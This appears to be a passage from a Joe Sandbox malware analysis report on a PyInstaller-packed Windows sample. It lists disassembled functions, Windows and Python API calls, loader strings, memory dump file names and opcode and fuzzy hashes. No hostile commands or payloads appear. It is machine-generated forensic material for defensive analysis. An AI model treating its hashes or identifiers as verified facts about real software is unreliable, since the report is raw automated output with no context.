                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                      • Instruction ID: 1f306e519a96028b74d20d62fd11342280a941ce0d22d7ee19ee4a040a80e00d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58126D62A0C1C386FB38BB14D1546F9B695FB41750FD44235E6BA47AC4DF3CE9888BA0
                                                                                                                                                                                                      Function 00007FF7FF591038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                      • Instruction ID: ee94746ab76c09dc172229fd4a4af167e040987f4deffd1534f6486bc1e4e9cf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03125022E0C1E386FF38BA15E0546F9E661EB40754FD84235E6B947AC4DF7CE4808BA4
                                                                                                                                                                                                      Function 00007FFBBCD41E9C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                      • API String ID: 211107550-393685449
                                                                                                                                                                                                      • Opcode ID: 579c448420c1f2a36cb32246af93653fbc5f1fd4bf1dbfa0e8ef84cdd48a3a2d
                                                                                                                                                                                                      • Instruction ID: 822b0c57b736286d2bd82037ecea00fd45b03184d4a9931a90d646792aab17dd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 579c448420c1f2a36cb32246af93653fbc5f1fd4bf1dbfa0e8ef84cdd48a3a2d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63E1C0F6B086828AE710DF78D4883AD7BA1FB44B59F104235DB8D57666DF38E481C704
                                                                                                                                                                                                      Function 00007FF7FF581050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                      • Opcode ID: 1c2171175d3d913f9d049cd0caef72b4136420d7d17f701daae5e244edb4a223
                                                                                                                                                                                                      • Instruction ID: 130b96ae9817b0e558ee9e765f441cb743f971aefdf0deaf4aa8a81fee3a9b7f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c2171175d3d913f9d049cd0caef72b4136420d7d17f701daae5e244edb4a223
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80415721A0869286EB14FB12A8406FAE794BF45B84FC44632ED7D077D6DE3CE546C7E0
                                                                                                                                                                                                      Function 00007FFBBB631ED4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 119COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func
                                                                                                                                                                                                      • String ID: %d work, %d block, ratio %5.2f$ too repetitive; using fallback sorting algorithm$VUUU
                                                                                                                                                                                                      • API String ID: 711238415-2988393112
                                                                                                                                                                                                      • Opcode ID: 18a46e59b38c0ffc594a90cb27ab0c0b365cb8b5e384a93f1effe7021e4673d3
                                                                                                                                                                                                      • Instruction ID: 172fc190bae116d0adfaac929023684d3d8cb31e1b0c896d71f2877a2c2693e7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a46e59b38c0ffc594a90cb27ab0c0b365cb8b5e384a93f1effe7021e4673d3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F418CB3A0864287E6149B3DD845168B7A5FB98B94F108236DF0F537A5DF39EC82C604
                                                                                                                                                                                                      Function 00007FF7FF588850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF7FF583CBB), ref: 00007FF7FF5888F4
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7FF583CBB), ref: 00007FF7FF5888FA
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00007FF7FF583CBB), ref: 00007FF7FF58893C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588A20: GetEnvironmentVariableW.KERNEL32(00007FF7FF58388E), ref: 00007FF7FF588A57
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7FF588A79
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5982A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5982C1
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582810: MessageBoxW.USER32 ref: 00007FF7FF5828EA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                      • API String ID: 3563477958-1339014028
                                                                                                                                                                                                      • Opcode ID: 3a70bda7ffd5e2f24f75b68c8ad2fcede7245b413113c53eacf20ccce7bf2460
                                                                                                                                                                                                      • Instruction ID: 86979438d1f6213863f5b2f138208d8bac97bee4d79f3f3289ff0c5bc3daa82e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a70bda7ffd5e2f24f75b68c8ad2fcede7245b413113c53eacf20ccce7bf2460
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A419D12A096C340EB24BB25A8552F99291FF89B85FC04331ED3D4B7D6EE3CE501C6E0
                                                                                                                                                                                                      Function 00007FFBBCD4B088 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                      • API String ID: 2943138195-2239912363
                                                                                                                                                                                                      • Opcode ID: b834bdc2b4e624d8bfe4a0aa6ffd56aa1f04fb76a255bf56b0e6c1b80a1fdf25
                                                                                                                                                                                                      • Instruction ID: 05c814bda7afa221866c2f831e1588742aa47fd08df3f68c8d4a460a83be77ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b834bdc2b4e624d8bfe4a0aa6ffd56aa1f04fb76a255bf56b0e6c1b80a1fdf25
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B512BEAF18B91A9FB11CB78D8492BD37B0BB18744F444236CB4D22A95DF3CA585C718
                                                                                                                                                                                                      Function 00007FF7FF58EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                      • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                      • Instruction ID: c0b18e7f5c9e2c966aeb331c1505eb08ddfd7a0d8cbffe6cc55aafa00969d228
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD17C32A0879187EB20ABA5D4403EDB7B0FB45798F900235EA6D57BD6DF38E484C790
                                                                                                                                                                                                      Function 00007FF7FF582C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582C9E
                                                                                                                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582D63
                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF7FF582D99
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                      • API String ID: 3940978338-251083826
                                                                                                                                                                                                      • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                      • Instruction ID: 652bea952ee70fcb8e0ddebb2e345548fb152ccc6124e73bdbcaf7afb49e76ea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3031F822708A8152E720BB25B8146EBAA91BF847C8F800235EF6D937D9DF3CD516C390
                                                                                                                                                                                                      Function 00007FFBBB611EAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyBytes_FromStringAndSize.PYTHON313(?,?,?,?,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB611EF1
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB611F35
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,?,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB611F51
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,?,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB611F98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dealloc$Bytes_FromSizeStringmemcpy
                                                                                                                                                                                                      • String ID: Unable to allocate output buffer.
                                                                                                                                                                                                      • API String ID: 76732796-2565006440
                                                                                                                                                                                                      • Opcode ID: b929f9677e0643720c4865ccbd9dde636c951ab58911de356605792b00dfea6a
                                                                                                                                                                                                      • Instruction ID: b4f39ef3d1910344d71b70b05349bc550276b61577ad65eadc8a52de15481719
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b929f9677e0643720c4865ccbd9dde636c951ab58911de356605792b00dfea6a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C41EAB6A09A0685EB559F3AD850279B3A0FB48F94F08A032DF1E47765CF38DC92C304
                                                                                                                                                                                                      Function 00007FFBBB6102C4 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 92COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyDict_New.PYTHON313(?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB6102D1
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6103F8: PyLong_FromUnsignedLongLong.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB610410
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6103F8: PyUnicode_InternFromString.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB610421
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6103F8: PyDict_SetItem.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB61043C
                                                                                                                                                                                                      • PyErr_Format.PYTHON313(?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB615580
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB61559C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dict_FromLong$DeallocErr_FormatInternItemLong_StringUnicode_Unsigned
                                                                                                                                                                                                      • String ID: Invalid filter ID: %llu$dict_size$dist$start_offset
                                                                                                                                                                                                      • API String ID: 1484310907-3368833446
                                                                                                                                                                                                      • Opcode ID: 0d766450421b01eefe42396fddca15447d36c2f595c72f33b576de2da6cedc60
                                                                                                                                                                                                      • Instruction ID: 0c6ba90d3b080bcc366315f7975d560d2f01baebdca80322cbe3d50790a3062d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d766450421b01eefe42396fddca15447d36c2f595c72f33b576de2da6cedc60
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D410CB1E08A0786EE684B3EDD41178B361FB05794B44E132DB2E466B0EF6CEC648709
                                                                                                                                                                                                      Function 00007FFBBCD456A4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD45729
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD45737
                                                                                                                                                                                                      • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD45750
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD45762
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD457D0
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FFBBCD45863,?,?,00000000,00007FFBBCD45694,?,?,?,?,00007FFBBCD453D1), ref: 00007FFBBCD457DC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                      • API String ID: 916704608-2084034818
                                                                                                                                                                                                      • Opcode ID: e684dc1ea15019c11da8b5489464cae19cb3925c8f7c5ac0dd2cd0c8e7a31cf1
                                                                                                                                                                                                      • Instruction ID: 00a9d92c0e5764f87a9190e84c92ad30c35ee13cb1fa6d48beff1394020b801e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e684dc1ea15019c11da8b5489464cae19cb3925c8f7c5ac0dd2cd0c8e7a31cf1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D31A1F9B1A642D2EE11EB2AE8485B56394BF04B64F590535DF2D07390EF3CE544C308
                                                                                                                                                                                                      Function 00007FFBBB63C6AC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
